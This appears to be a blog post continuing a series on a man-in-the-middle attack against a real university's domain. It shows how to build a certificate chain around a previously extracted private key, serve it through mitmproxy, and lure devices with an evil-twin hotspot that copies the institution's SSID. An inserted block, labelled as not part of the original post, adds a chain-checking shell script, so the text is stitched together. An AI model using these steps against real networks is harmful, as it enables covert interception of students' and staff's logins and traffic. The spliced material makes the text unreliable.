Continuing from the previous post, we will now try to perform a MITM attack on the vulnerable subdomains with mitmproxy.

Building the full chain

In order to perform the attack, we must first assemble the full certificate chain, so that the "victims" can validate it. To do this, we download the chain the vulnerable server already presents:

openssl s_client -showcerts -connect sakai.itba.edu.ar:443

Once we have this data, we can begin assembling the certificate in PEM format:

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

The RSA Private Key is the one we extracted in the previous post, and the Certificate sections are the ones returned by openssl, in the exact same order (the server's leaf certificate first, followed by the intermediates).
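A mismatched key or a mis-ordered chain is the usual reason such a bundle fails, so here is the sanity check an operator would run on any assembled PEM file (for example when auditing or rotating a leaked key). This is an added example, not part of the original post; it assumes `openssl` is on PATH and that the bundle holds the private key first, then the leaf, then the intermediates; `chain_check` is a hypothetical name.

```shell
#!/bin/sh
# Checks an assembled PEM bundle: (1) the private key matches the leaf
# certificate, (2) every certificate's issuer is the subject of the next one.
# Returns 0 if both hold, 1 otherwise.
chain_check() {
    bundle="$1"
    work=$(mktemp -d) || return 1
    # Split the CERTIFICATE blocks into cert1.pem, cert2.pem, ... in file order.
    awk -v dir="$work" '
        /-----BEGIN CERTIFICATE-----/ { n++; out = dir "/cert" n ".pem" }
        out != "" { print > out }
        /-----END CERTIFICATE-----/ { close(out); out = "" }
    ' "$bundle"
    ncerts=$(ls "$work" | wc -l | tr -d ' ')
    if [ "$ncerts" -lt 1 ]; then rm -rf "$work"; return 1; fi
    # (1) Compare the public key derived from the private key with the leaf's.
    keypub=$(openssl pkey -in "$bundle" -pubout 2>/dev/null)
    leafpub=$(openssl x509 -in "$work/cert1.pem" -noout -pubkey 2>/dev/null)
    if [ -z "$keypub" ] || [ "$keypub" != "$leafpub" ]; then
        rm -rf "$work"; return 1
    fi
    # (2) Walk the chain: issuer of cert i must equal subject of cert i+1.
    i=1
    while [ "$i" -lt "$ncerts" ]; do
        issuer=$(openssl x509 -in "$work/cert$i.pem" -noout -issuer | sed 's/^issuer=//')
        subject=$(openssl x509 -in "$work/cert$((i + 1)).pem" -noout -subject | sed 's/^subject=//')
        if [ "$issuer" != "$subject" ]; then rm -rf "$work"; return 1; fi
        i=$((i + 1))
    done
    rm -rf "$work"
    return 0
}

# Usage: sh chain_check.sh itba.fullchain.crt
if [ -n "$1" ]; then
    if chain_check "$1"; then echo "chain ok"; else echo "chain BROKEN"; fi
fi
```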

Executing the proxy

When executing the proxy, we must instruct it to use the certificate chain we assembled:

./mitmproxy --cert=itba.fullchain.crt

This will make sure that whenever a client accesses any subdomain of *.itba.edu.ar using HTTPS, the proxy will return a valid, trusted certificate instead of a self-signed one.

All that's left is to configure the local machine as a transparent proxy, and no victim will notice you. A nice way of doing this is to make a Hotspot and choose the same SSID as the institution. Eventually, some device will roam to your network.
